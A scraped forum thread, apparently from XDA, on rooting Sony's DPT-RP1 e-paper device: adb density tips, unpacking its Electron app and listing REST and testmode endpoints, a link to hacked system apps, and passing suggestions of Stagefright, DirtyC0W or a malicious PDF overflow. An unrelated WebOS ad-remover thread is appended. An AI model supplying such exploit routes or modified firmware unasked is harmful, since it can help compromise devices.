Then change the setting of Multi Action Home button (say, the height should be large to be visible in the bottom) and assign its function to be Home for click and Back for double-click.
Whenever you want to use Sony's apps (these are good for pdf markup), just push the home button to open the pop-up menu.
Otherwise, touch the Multi Action Home Button to access to other Android apps. So far I've never experience any crash.
Yet more tips:
Some complain fonts are too small after installing generic apps.
adb shell wm density 320 changes your DPI by 2 times (160 is a default value.) EDIT: I found 200 is quite enough that does not distort Sony apps too much.
My application is using "Tasker" to execute the above code when specific apps are open and execute wm density reset when the apps are closed.
The reason why we cannot change the global DPI is sadly because it makes the default apps by Sony so awkward.
Alternatively, I could successfully install Xposed to try App Settings but this app crashed.
You can also install Gboard (but it has no hide button, so prepare with virtual back button) if you need another keyboard.
Enjoy your DPT devices
--
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
And here you can find source codes.
oss.sony.net/Products/Linux/dp/DPT-RP1.html
sartrism said:
Sony recently released a new digital paper device DPT-RP1, apparently using their own linux firmware but underlying on Android 5.1.1. Few weeks ago, some Chinese successfully hacked it to jailbreak for third-party apps (without changing the original firmware), but they don't share any information to sell those hacked devices. I'm willing to pay for it, but it is too risky to send my device to China so I'm trying to root it by myself.
I don't know much about this world, but I found some information that might be helpful. It uses Marvell A140 IoT Processor a.k.a. PXA1908. There are two Android smartphones (as the same version 5.1.1) with this chip - Samsung Xcover 3 and Samsung Galaxy Grand Prime. Fortunately, they have been both rooted in the past here.
Is this information really helpful to root my device? If so, is there any way to apply the previous methods to easily jailbreak DPT-RP1? I think the problem here is that it does not look like Android at all, so has no setting menu or developer tools. And not sure how to enter to the recovery mode since it only has two buttons - power/menu.
I'd appreciate any help or advice. Thanks!
Click to expand...
Click to collapse
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
Click to expand...
Click to collapse
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
sartrism said:
Thanks for suggesting a general principle! I just use the word jailbreaking not because I'm an iPhone user. What I actually want to do as the first step is not rooting an android system, but revealing it from the current customized linux system. Rooting is the next step if necessary. If the word choice is still not accurate and bothers you, I apologize.
It has apparently no typical bootloader, and neither PC nor adb recognize it as an android device. In fact, direct USB file transfer is blocked so I need to use Sony's designated software. But an android system surely coexists according to the hacker who already rooted it.
Click to expand...
Click to collapse
Without some kind of way to flash or interface with the device there isn't much you can do.
I have a kindle fire HD that didn't come with a typical android system but does have a typical bootloader. The Amazon OS was removed and now it's full blown android but it required a "second" bootloader. You don't have a bootloader so I'm not sure what your options are with that device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You must be an iPhone user that isn't familiar with android. Jailbreak in is an Apple thing, not an android thing.
In android it's called "rooting" and it isn't quite the same thing as jailbreaking an Apple device.
This device does not at all seem to be worth the price, especially considering the limitations it has. What a waste of hardware.
I would assume that you could port something from one of those other devices to work on yours but it really depends on how your hardware is designed compared to those devices.
Does your device have a typical bootloader like other android devices?
Is the bootloader unlocked?
If it is locked, can it be unlocked?
Does the device use fastboot or does it have a flash mode that is used with a specific PC flashtool?
If it is unlocked or if you can unlock it and it has a flash mode that can actually be used, you might be able to port a custom recovery from one of the devices you named then use that recovery to somehow root the device. If the device can't install android apps then it would probably involve using adb to root the device.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Click to expand...
Click to collapse
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
MarkBell said:
Jailbreaking is the process of modifying any electronic device in order to remove restrictions imposed by a manufacturer (Apple) or operator (to allow the installation of unauthorized software).
Rooting is the act of gaining access to the root account of a device (such as a smartphone or computer).
There is a huge difference between the two. You can't just say that rooting is Android's version of jailbreaking. Not accurate in the least.
https://www.androidpit.com/jailbreak-android
Sent from my SM-G928T using Tapatalk
Click to expand...
Click to collapse
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Droidriven said:
You're reading too much into what I said.
Basically, what I said was that jailbreaking isn't an android thing, it's an Apple thing(didn't say it was exclusively an Apple thing, just NOT an android thing). It applies to more than just Apple devices but on this website dedicated to mobile platforms, I'm only referring to its application in the mobile device world. For the mobile world it's pretty much only an Apple thing(still not exclusively but mostly so).
Then I said that in the android world it's called rooting(not exclusively an android thing, just NOT an Apple thing). And that jailbreaking and rooting aren't the same thing(this does not say that rooting is android's version of jailbreaking, that would imply that they are the same thing, I'm saying they aren't the same thing)
Basically, explaining what they "aren't", you explained what they "are".
I understand the difference, but thank you.
I DO NOT PROVIDE HELP IN PM, KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Click to expand...
Click to collapse
I tend to read too deeply into everything. It's the way I am. Lol.
Sent from my SM-G928T using Tapatalk
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
happy to help with simple things
thisvip said:
Could you please post some information about usb device? Just like PID & VID.
Do it like:
Connect DPT-RP1 to Linux, and then type this command 'lsusb'
P.S. Under Windows or MacOS system, you can find the information from system settings...
Click to expand...
Click to collapse
Bus 001 Device 008: ID 054c:0be5 Sony Corp.
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customer. I guess he did sometihng like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow an usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
sartrism said:
It is good to see some people have been interested in this thread.
So far, I realized that the hacker used a hardware hacking method. I actually obtained the hacked system apps from one of his customer. I guess he did sometihng like directly modifying eMMC to root and put "USBDeviceSwitcher.apk" to allow an usual USB connection. Since I don't want to take such risk, I decided to wait until the first firmware to see if there could be an indirect way to penetrate the system files. But if you want to analyze the hacked system, contact me.
Click to expand...
Click to collapse
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you finished your modifications you have pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
mcplectrum said:
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you finished your modifications you have pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
Click to expand...
Click to collapse
Hope you get some result from wifi side. I also realized they use the port 8443 but couldn't get further as you.
For whom trying to hack it, here is the link for the already 'hacked' system apps (including the original files) - that of the famous hacked RP1 video. Inside the subfolder S1, there are also the hacked system apps for DPT-S1 just in case.
https://www.dropbox.com/sh/dvtvokdzrgwjc83/AACXOJA-E56nUpUfiWUOzrM3a?dl=0
George Malas said:
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
Click to expand...
Click to collapse
The stock device has no web browser, no sd-card, no usb connection, and no typical system. I think SONY was haunted by some security issues maybe because they thought the major users are lawyers or very important people? lol
Any chance to create a buffer overflow PDF to attack RP1's pdf reader?
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
jess91 said:
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
Click to expand...
Click to collapse
If you're interested and supportive of this then go buy one anyway and apply yourself to going forward figuring out how to get it done. Other than that, you're not supportive, you're just hopeful that someone figures it out and then you'll probably go get one.
DO NOT CONTACT ME VIA PM TO RECEIVE HELP, YOU WILL BE IGNORED. KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This alread is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to adroid and that stuff.
Paderico said:
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This alread is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to adroid and that stuff.
Click to expand...
Click to collapse
Just a little update from my side. I'm currently tryng to recreate the steps @mcplectrum was using. It seems that my RP1 also uses other ports. I tried to wireshark the USB and WiFi connection. By that I saw that often GET /registration/information is called for Host: localhost:58052. Moreover the first call is GET /register/serial_number also on port 5808. This was via USB.
Trying to trigger the /auth/ call via Telnet returns nothing unfortunately. But also the 8080 port is open. Trying to call digitalpaper.local:8443/auth/ returns nothing on firefox.
@mcplectrum: how did you get the client_id and what would one need that for?
I also tried to change the config.DEVBUILD to true but that seemed to change nothing at all.
So to sum up what we know:
The device is using some kind of android structure, the source code seems to use the uboot bootloader, all communication is done by a rest restlet framework. So actually there should be some kind of way to use the restlet framework to PUT or POST the modified files.
The other option would be directly flash the eMMC right? I would take the risk and just load it on my device and see what happens. Any hints on how to do that?
GitHub - bashalarmist/war-webos-ad-remover: Removes Ads on WebOS home screen
Removes Ads on WebOS home screen. Contribute to bashalarmist/war-webos-ad-remover development by creating an account on GitHub.
github.com
This removes the AI Recommendations and the Trending section from the WebOS home screen.
The readme should cover everything you need to know, but feel free to ask here if you need any help.
This is the inital release and a testing version. I have only tested on my device, but it is working well. Please comment here if you have success.
Future updates may remove other items from the home screen and/or add compatibility. There is also a lot of potential for customization here.
Oh my GOD ! thanks you are my hero. Works perfect. The TV menu is really fast now !
Can we remove the unused space previously occuped by trending and others lg **** ? same as blocking their ip from the dns ?
First of all, thanks for sharing this.
While I'm clear on how to proceed for testing (USB drive, etc.), I would like to understand what you mean by "copy the script to /var/lib/webosbrew/init.d/".
init.d is a directory and I need to copy the file with your code there, correct?
Sorry for the stupid question but I'm a total newbie on webOS.
Legend, bought my new LG TV and was so disappointed seeing the new UI. Excellent work, I love the way you've used bind mounts to make things safer for folks to use, very clever. I had great fun fiddling with it.
For anyone curious, here's what the TV looks like after running this.
I've also noticed that when the TV boots, it shows a much nicer quick menu, like the older TVs had. I spent some time but was unable to figure out how to launch it. Would be pretty cool if we could restore the old home button functionality.
Maho007 said:
Can we remove the unused space previously occuped by trending and others lg **** ? same as blocking their ip from the dns ?
Click to expand...
Click to collapse
I'll be putting out an update eventually, within the next month. I'll dive in and get rid of some more things.
gorman42 said:
While I'm clear on how to proceed for testing (USB drive, etc.), I would like to understand what you mean by "copy the script to /var/lib/webosbrew/init.d/".
init.d is a directory and I need to copy the file with your code there, correct?
Sorry for the stupid question but I'm a total newbie on webOS.
Click to expand...
Click to collapse
webos-homebrew-channel/README.md at main · webosbrew/webos-homebrew-channel
Unofficial webOS TV homebrew store and root-related tooling - webos-homebrew-channel/README.md at main · webosbrew/webos-homebrew-channel
github.com
"(root) Startup user hooks (executable scripts present in /var/lib/webosbrew/init.d are run on bootup)"
Yes, copying the file there will enable the script to run when the TV boots, otherwise when the TV reboots the ads will be back.
The next version will have an option to auto install the script.
What's the difference between this and just adding a dns to block adds? Thank you
Just wanted to say thanks for this. It's really sped up my TV and made it all a bit smoother. 'm interested to see how you make it self install and how customisable that space is in the next version.
Is there an updated version for 6.3.1? The script fails on the checksum.